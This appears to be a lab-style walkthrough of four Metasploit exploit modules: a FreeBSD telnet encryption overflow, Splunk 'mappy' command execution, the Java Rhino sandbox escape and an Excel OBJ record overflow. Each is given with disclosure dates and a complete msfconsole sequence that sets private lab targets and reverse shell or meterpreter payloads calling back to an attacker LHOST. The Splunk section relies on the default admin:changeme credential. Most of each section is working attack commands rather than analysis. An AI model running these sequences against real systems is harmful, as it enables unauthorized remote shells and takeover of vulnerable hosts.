This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.
Commands :
use exploit/freebsd/telnet/telnet_encrypt_keyid
set RHOST 192.168.178.112
SET PAYLOAD bsd/x86/shell/reverse_tcp
set LHOST 192.168.178.100
exploit
id
uname -a
Vulnerability discovered and reported to the vendor by Gary Oleary-Steele
Coordinated public release of the vulnerability the 2011-12-12
Metasploit PoC provided the 2011-12-22
This module abuses a command execution vulnerability in the web based interface of Splunk 4.2 to 4.2.4. The vulnerability exists in the ‘mappy’ search command which allows attackers to run Python code. To exploit this vulnerability, a valid Splunk user with the admin role is required. By default, this module uses the credential of “admin:changeme”, the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows and as root on Linux by default.
Commands :
use exploit/multi/http/splunk_mappy_exec
set RHOST 192.168.178.110
set VHOST blackhole.zataz.loc
SET PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit
id
uname -a
Vulnerability discovered and reported to ZDI by Michael Schierl
Vulnerability reported to vendor by ZDI the 2011-05-12
Coordinated release of the vulnerability the 2011-10-26
First exploit provided by Michael Schierl
Metasploit PoC provided the 2011-11-29
PoC provided by :
Michael Schierl
juan vazquez
Edward D. Teach
sinn3r
This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc)
Commands :
use exploit/multi/browser/java_rhino
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
getuid
sysinfo
Vulnerability discovered and reported to vendor by Nicolas Joly
Coordinated release of the vulnerability the 2010-06-08
First exploit provided by abysssec the 2010-09-24
Metasploit PoC provided the 2011-11-21
Microsoft Office Excel 2002 Service Pack 3 and below
Microsoft Office Excel 2003 Service Pack 3 and below
Microsoft Office Excel 2007 Service Pack 1 and below
Microsoft Office Excel 2007 Service Pack 2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac
Microsoft Office Excel Viewer Service Pack 1 and below
Microsoft Office Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel
PowerPoint 2007 File Formats Service Pack 1
Microsoft Office Compatibility Pack for Word, Excel
PowerPoint 2007 File Formats Service Pack 2
Tested on Windows XP Pro SP3 with :
Microsoft Excel 2002 (10.2614.2625) SP0
Description :
This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker can get the control of the execution flow. This results arbitrary code execution under the context of the user.
Commands :
use exploit/windows/fileformat/ms10_038_excel_obj_bof
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
getuid
sysinfo